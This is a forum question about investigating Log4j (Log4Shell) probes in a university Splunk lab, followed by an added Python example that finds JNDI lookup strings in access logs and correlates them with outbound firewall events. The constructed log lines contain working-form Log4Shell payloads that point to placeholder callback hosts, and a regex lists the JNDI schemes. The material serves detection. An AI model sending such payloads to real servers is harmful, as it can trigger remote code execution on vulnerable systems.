Hello, during these crazy Log4j times I would like to ask you for advice. I am new to Splunk/security, but I managed to create a dashboard for Log4j attempts. I can see some Log4j scanning activity and the codes are 404, 400 etc., which I am not really worried about. But sometimes I have code 200, which as I can see means: "The HTTP 200 OK success status response code indicates that the request has succeeded. The meaning of a success depends on the HTTP request method: ... GET: The resource has been fetched and is transmitted in the message body." I added a screenshot. I am wondering how to investigate it? Should I check for outbound traffic? What is the best query? So far I have just one: index=firewall 170.210.45.163 AND 31.131.16.127 ? This is my Uni lab environment, so I just want to develop myself and learn. What would you do if you see such a string? Many thanks
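An added example (not from the original post or from Splunk) of the check asked about above: it parses constructed web-server access log lines for JNDI lookup strings, separates the probes that received a 200, and correlates the callback host embedded in each probe with constructed firewall events for outbound connections from the web server. All log lines, addresses, ports and the key=value firewall fields are made up for the example.

```python
import re
from urllib.parse import unquote

# Constructed access log lines (not real traffic); 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
WEB_LOGS = [
    '203.0.113.7 - - [12/Dec/2021:10:01:02 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.9:1389/a}"',
    '203.0.113.7 - - [12/Dec/2021:10:01:05 +0000] "GET /${jndi:dns://198.51.100.9/x} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '203.0.113.8 - - [12/Dec/2021:10:02:00 +0000] "GET /api?q=%24%7Bjndi%3Armi%3A%2F%2F198.51.100.20%3A1099%2Fo%7D HTTP/1.1" 400 0 "-" "Mozilla/5.0"',
]
# Constructed firewall events for the web server (10.0.0.5) connecting outbound; the key=value layout is assumed.
FW_LOGS = [
    'src=10.0.0.5 dst=198.51.100.9 dport=1389 action=allow',
    'src=10.0.0.5 dst=198.51.100.9 dport=53 action=allow',
    'src=10.0.0.5 dst=198.51.100.20 dport=1099 action=deny',
]

# Combined-format access log: src ident user [time] "method path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')
# JNDI lookup string: scheme, callback host, optional port
JNDI_RE = re.compile(r'\$\{jndi:(ldap|ldaps|rmi|dns|iiop|nis|corba)://([^/:}\s]+)(?::(\d+))?', re.I)

def find_probes(lines):
    """Return one dict per log line whose path or User-Agent carries a JNDI lookup string."""
    probes = []
    for m in filter(None, map(LOG_RE.match, lines)):
        src, _ts, _method, path, status, ua = m.groups()
        for field in (unquote(path), ua):  # decode %xx so URL-encoded probes are not missed
            j = JNDI_RE.search(field)
            if j:
                scheme, host, port = j.groups()
                probes.append({'src': src, 'status': int(status), 'scheme': scheme.lower(),
                               'callback': host, 'port': int(port) if port else None})
                break
    return probes

def succeeded_probes(probes):
    # 200 only says the app served the request; it does not say whether the string was logged and looked up.
    return [p for p in probes if p['status'] == 200]

def outbound_matches(probes, fw_lines):
    """Correlate probe callback hosts with outbound firewall events: an allowed connection from the
    server to the callback host (and port, when the probe named one) shows the lookup actually fired."""
    hits = set()
    for fw in fw_lines:
        kv = dict(t.split('=', 1) for t in fw.split())
        for p in probes:
            if kv['dst'] == p['callback'] and p['port'] in (None, int(kv['dport'])):
                hits.add((kv['dst'], int(kv['dport']), kv['action']))
    return sorted(hits)
```

The same correlation in Splunk is to extract the callback host from the web index and join it against the destination field of the firewall index, restricted to traffic whose source is the web server.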